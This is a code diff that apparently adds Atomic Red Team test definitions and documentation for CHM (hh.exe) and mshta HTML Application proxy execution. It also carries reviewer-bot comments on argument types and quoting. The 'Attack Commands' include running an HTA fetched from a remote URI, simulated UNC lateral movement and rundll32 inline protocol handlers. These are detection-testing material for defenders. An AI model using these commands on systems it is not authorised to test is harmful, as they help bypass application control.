+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Invoke CHM Simulate Double click
+Executes a CHM file simulating a user double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Invoke CHM with Script Engine and Help Topic
+Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| script_engine | Default Script Engine | string | JScript|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic
+Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| topic_extension | Default Help Topic | string | html|
+| hh_file_path | path of modified HH.exe | path | $env:windir\hh.exe|
+| infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
+| chm_file_path | Default path of CHM | string | Test.chm|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1218.001/T1218.001.yaml b/atomics/T1218.001/T1218.001.yaml
index 9ef61e03..e73024c3 100644
--- a/atomics/T1218.001/T1218.001.yaml
+++ b/atomics/T1218.001/T1218.001.yaml
@@ -43,3 +43,152 @@ atomic_tests:
hh.exe #{remote_chm_file}
name: command_prompt
+- name: Invoke CHM with default Shortcut Command Execution
+ auto_generated_guid: 29d6f0d7-be63-4482-8827-ea77126c1ef7
+ description: Executes a CHM file with the default Shortcut Command method.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with InfoTech Storage Protocol Handler
+ auto_generated_guid: b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+ description: Executes a CHM file with the ITS protocol handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Simulate Double click
+ auto_generated_guid: 5decef42-92b8-4a93-9eb2-877ddcb9401a
+ description: Executes a CHM file simulating a user double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM with Script Engine and Help Topic
+ auto_generated_guid: 4f83adda-f5ec-406d-b318-9773c9ca92e5
+ description: Executes a CHM file with a defined script engine, ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ script_engine:
+ description: Default Script Engine
+ type: string
+ default: JScript
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
+
+- name: Invoke CHM Shortcut Command with ITS and Help Topic
+ auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247
+ description: Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension.
+ supported_platforms:
+ - windows
+ input_arguments:
+ topic_extension:
+ description: Default Help Topic
+ type: string
+ default: html
+ hh_file_path:
+ description: path of modified HH.exe
+ type: path
+ default: $env:windir\hh.exe
+ infotech_storage_handler:
+ description: Default InfoTech Storage Protocol Handler
+ type: string
+ default: its
+ chm_file_path:
+ description: Default path of CHM
+ type: string
+ default: Test.chm
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHCompiledHelp must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotech_storage_handler} -TopicExtension #{topic_extension} -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}'
+ name: powershell
\ No newline at end of file
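Review bot: The `input_arguments` types are inconsistent within this hunk: `hh_file_path` is declared `type: path` while `chm_file_path`, whose description is "Default path of CHM", is `type: string` in all five new tests (lines with `chm_file_path:`), so tooling that validates or resolves `path` arguments treats the two differently for no apparent reason. The executor commands also substitute the path arguments unquoted, e.g. `-HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}`, so any user-supplied path containing a space splits into separate tokens; `command: 'Invoke-ATHCompiledHelp -HHFilePath "#{hh_file_path}" -CHMFilePath "#{chm_file_path}"'` keeps the `$env:windir` default expanding while making the override safe. Minor style: `prereq_command` uses `|-` but `get_prereq_command` uses `|` in every dependency block, and the added last line leaves the file without a trailing newline, which most editors and linters will flag on the next touch.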
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 7b35e97e..077398a1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -18,6 +18,18 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
- [Atomic Test #3 - Mshta Executes Remote HTML Application (HTA)](#atomic-test-3---mshta-executes-remote-html-application-hta)
+- [Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement](#atomic-test-4---invoke-html-application---jscript-engine-over-local-unc-simulating-lateral-movement)
+
+- [Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click](#atomic-test-5---invoke-html-application---jscript-engine-simulating-double-click)
+
+- [Atomic Test #6 - Invoke HTML Application - Direct download from URI](#atomic-test-6---invoke-html-application---direct-download-from-uri)
+
+- [Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler](#atomic-test-7---invoke-html-application---jscript-engine-with-rundll32-and-inline-protocol-handler)
+
+- [Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler](#atomic-test-8---invoke-html-application---jscript-engine-with-inline-protocol-handler)
+
+- [Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path](#atomic-test-9---invoke-html-application---simulate-lateral-movement-over-unc-path)
+
@@ -109,4 +121,270 @@ remove-item "#{temp_file}" -ErrorAction Ignore
+
+
+
+## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click
+Executes an HTA Application using JScript script engine simulating double click.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_engine | Script Engine to use | string | JScript|
+| hta_file_path | HTA file name and or path to be used | string | Test.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Invoke HTML Application - Direct download from URI
+Executes an HTA Application by directly downloading from remote URI.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rundll32_file_path | Location of rundll32.exe | string | $env:windir\system32\rundll32.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler
+Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+| script_engine | Script Engine to use | string | JScript|
+| protocol_handler | Protocol Handler to use | string | About|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
+
+
+
+## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path
+Executes an HTA Application with Simulate lateral movement over UNC Path.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mshta_file_path | Location of mshta.exe | string | $env:windir\system32\mshta.exe|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+```
+
+
+
+
diff --git a/atomics/T1218.005/T1218.005.yaml b/atomics/T1218.005/T1218.005.yaml
index 6cc6af2c..84790d0a 100644
--- a/atomics/T1218.005/T1218.005.yaml
+++ b/atomics/T1218.005/T1218.005.yaml
@@ -50,4 +50,168 @@ atomic_tests:
mshta "#{temp_file}"
cleanup_command: |
remove-item "#{temp_file}" -ErrorAction Ignore
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement
+ auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447
+ description: Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Jscript Engine Simulating Double Click
+ auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33
+ description: Executes an HTA Application using JScript script engine simulating double click.
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ hta_file_path:
+ description: HTA file name and or path to be used
+ type: string
+ default: Test.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick'
+ name: powershell
+
+- name: Invoke HTML Application - Direct download from URI
+ auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db
+ description: Executes an HTA Application by directly downloading from remote URI.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ hta_uri:
+ description: URI to HTA
+ type: string
+ default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler
+ auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af
+ description: Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ rundll32_file_path:
+ description: Location of rundll32.exe
+ type: string
+ default: $env:windir\system32\rundll32.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - JScript Engine with Inline Protocol Handler
+ auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+ description: Executes an HTA Application with JScript Engine and Inline Protocol Handler.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ script_engine:
+ description: Script Engine to use
+ type: string
+ default: JScript
+ protocol_handler:
+ description: Protocol Handler to use
+ type: string
+ default: About
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}'
+ name: powershell
+
+- name: Invoke HTML Application - Simulate Lateral Movement over UNC Path
+ auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362
+ description: Executes an HTA Application with Simulate lateral movement over UNC Path.
+ supported_platforms:
+ - windows
+ input_arguments:
+ mshta_file_path:
+ description: Location of mshta.exe
+ type: string
+ default: $env:windir\system32\mshta.exe
+ dependencies:
+ - description: The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.
+ prereq_command: |-
+ $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
+ executor:
+ command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path}'
name: powershell
\ No newline at end of file
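Review bot: The new tests type every executable location (`mshta_file_path`, `rundll32_file_path`) as `type: string`, whereas the T1218.001.yaml change in this same commit types the equivalent `hh_file_path` as `type: path`; pick one convention for the commit, and `type: path` matches what the descriptions ("Location of mshta.exe") say the value is. Likewise `hta_uri` is a `string` although its description is "URI to HTA"; the atomic schema's `url` type would document intent and let validators check the default. The URI is also substituted unquoted in `command: 'Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}'`, so a supplied URI with `&` or a space would be mis-parsed by PowerShell; quoting as `-HTAUri "#{hta_uri}" -MSHTAFilePath "#{mshta_file_path}"` avoids that while keeping the `$env:windir` default working. The same unquoted-substitution pattern appears in the other five executor commands of this hunk.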
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 9123d06f..e4d70e0f 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -578,3 +578,18 @@ da75ae8d-26d6-4483-b0fe-700e4df4f037
342cc723-127c-4d3a-8292-9c0c6b4ecadc
1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
+14920ebd-1d61-491a-85e0-fe98efe37f25
+cbbff285-9051-444a-9d17-c07cd2d230eb
+e9f2b777-3123-430b-805d-5cedc66ab591
+2988133e-561c-4e42-a15f-6281e6a9b2db
+29d6f0d7-be63-4482-8827-ea77126c1ef7
+b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+5decef42-92b8-4a93-9eb2-877ddcb9401a
+4f83adda-f5ec-406d-b318-9773c9ca92e5
+15756147-7470-4a83-87fb-bb5662526247
+007e5672-2088-4853-a562-7490ddc19447
+58a193ec-131b-404e-b1ca-b35cf0b18c33
+39ceed55-f653-48ac-bd19-aceceaf525db
+e7e3a525-7612-4d68-a5d3-c4649181b8af
+d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+b8a8bdb2-7eae-490d-8251-d5e0295b2362